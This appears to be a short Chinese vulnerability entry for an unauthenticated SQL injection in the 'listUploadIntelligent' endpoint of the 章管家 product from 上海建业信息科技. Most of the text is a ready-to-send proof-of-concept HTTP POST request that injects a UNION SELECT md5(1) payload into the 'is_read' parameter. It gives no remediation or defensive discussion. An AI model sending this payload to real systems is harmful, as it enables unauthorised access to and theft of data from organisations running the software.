上海建业信息科技 章管家 listUploadIntelligent 未授权 SQL注入漏洞
PoC代码
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
person_id=1&unit_id=1&pageNo=1&is_read=-1 union select md5(1),2,3,4,5,6,7,8,9,10,11,12 --